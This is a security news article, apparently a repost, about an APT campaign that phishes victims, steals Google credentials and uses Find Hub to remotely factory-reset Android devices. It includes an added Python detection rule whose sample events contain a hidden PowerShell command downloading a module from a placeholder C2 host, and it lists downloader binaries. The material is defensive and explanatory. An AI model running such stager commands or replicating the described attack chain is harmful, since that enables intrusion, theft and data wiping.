Hackers Use Google Find Hub to Wipe Android Devices Remotely


461/68 Wednesday, November 12, 2025

Security researchers have discovered an advanced persistent threat (APT) group abusing the Google Find Hub (Android's Find My Device) service to locate victims via GPS and remotely trigger factory resets that erase their devices, covering the attackers' tracks. After wiping the devices, the attackers sever the victims' accounts from services, especially messaging apps, and then use the compromised accounts to forward malware to the victims' contacts.

Researchers found that the campaign begins with a phishing email impersonating a trusted organization. The attached .MSI or .ZIP file contains an install.bat installation script together with a decoy script that shows a fake "language error" to the victim. Meanwhile, the malware downloads additional modules from a command-and-control (C2) server, giving the attacker remote control of the machine and allowing theft of sensitive credentials such as email account passwords and other online service logins.
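The infection chain above (an installer or archive dropping install.bat, which then pulls modules from a C2 server) leaves a characteristic process-tree pattern on the endpoint. The following detection logic is an added example written for this page; it is not code from the article, BleepingComputer, or the researchers. It runs over constructed process-creation events in the spirit of Sysmon Event ID 1: the field names, the parent/child process sets, the 120-second correlation window and the `c2.invalid` URL are all assumptions for the example.

```python
import re
from datetime import datetime
from typing import Dict, List

# Constructed sample events (assumed field names; not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # ws01: MSI installer launches install.bat from the MSI temp dir,
    # and the batch file then fetches a module over HTTP (placeholder C2).
    {"ts": "2025-11-12T09:01:03Z", "host": "ws01",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\MSI4F2A.tmp\install.bat"'},
    {"ts": "2025-11-12T09:01:05Z", "host": "ws01",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://c2.invalid/mod.dat','C:\Users\alice\AppData\Local\Temp\mod.dat')"},
    # ws02: install.bat run straight from an extracted ZIP in Downloads.
    {"ts": "2025-11-12T09:03:10Z", "host": "ws02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\bob\Downloads\report\install.bat"'},
    # ws03: a legitimate vendor setup running a batch file from Program Files.
    {"ts": "2025-11-12T09:10:00Z", "host": "ws03",
     "parent": r"C:\Program Files\Vendor\Setup.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Program Files\Vendor\install.bat"'},
]

# A .bat path somewhere in the command line.
BATCH_RE = re.compile(r"[A-Za-z]:\\[^\"']*?\.bat\b", re.IGNORECASE)
# User-writable locations where mail attachments and archives get extracted.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\", re.IGNORECASE)
# Parents that indicate "user opened an installer/archive" (assumed set).
INSTALLER_PARENTS = {"msiexec.exe", "explorer.exe", "7zfm.exe", "winrar.exe", "winzip.exe"}
# Living-off-the-land binaries commonly used by stagers to fetch payloads.
DOWNLOADERS = {"powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _batch_path(cmdline: str):
    m = BATCH_RE.search(cmdline)
    return m.group(0) if m else None


def detect(events: List[Dict[str, str]], window_s: int = 120) -> List[Dict[str, str]]:
    """Two-stage rule: (1) cmd.exe spawned by an installer/shell running a .bat
    from a user-writable path; (2) within window_s on the same host, a
    downloader spawned by cmd.exe with an http(s) URL in its command line."""
    alerts: List[Dict[str, str]] = []
    last_batch: Dict[str, datetime] = {}  # host -> time of last stage-1 hit
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        image, parent = _basename(ev["image"]), _basename(ev["parent"])
        if image == "cmd.exe" and parent in INSTALLER_PARENTS:
            bat = _batch_path(ev["cmdline"])
            if bat and USER_WRITABLE.search(bat):
                alerts.append({"host": ev["host"], "stage": "batch-dropper", "detail": bat})
                last_batch[ev["host"]] = ts
                continue
        if image in DOWNLOADERS and parent == "cmd.exe" and "http" in ev["cmdline"].lower():
            seen = last_batch.get(ev["host"])
            if seen and (ts - seen).total_seconds() <= window_s:
                alerts.append({"host": ev["host"], "stage": "stager-download",
                               "detail": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["host"]:5} {a["stage"]:16} {a["detail"]}')
```

The stage-1 rule alone will fire on some legitimate software that unpacks to a temp directory, which is why ws03 (vendor setup under Program Files) is deliberately not matched and why the stage-2 correlation exists: a batch file launched from a freshly extracted attachment that immediately spawns a downloader is the pattern worth paging on, and the host-level hit is also the point at which to start reviewing the user's Google account sessions and linked devices.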

Once the attackers gain access to the victim's Google account, they use it to sign in to Find Hub, enumerate the Android devices linked to the account, and issue remote factory resets to wipe their data. They then use the hijacked account from the infected PC to distribute malicious files to the victim's contacts. Researchers recommend enabling multi-factor authentication (MFA) on Google accounts, regularly reviewing the devices connected to the account, and not opening attachments or downloading software from senders who cannot be directly verified.

Source: https://www.bleepingcomputer.com/news/security/apt37-hackers-abuse-google-find-hub-in-android-data-wiping-attacks/